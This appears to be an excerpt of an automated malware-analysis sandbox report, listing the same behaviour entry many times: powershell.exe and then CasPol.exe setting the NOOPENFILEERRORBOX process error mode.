Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
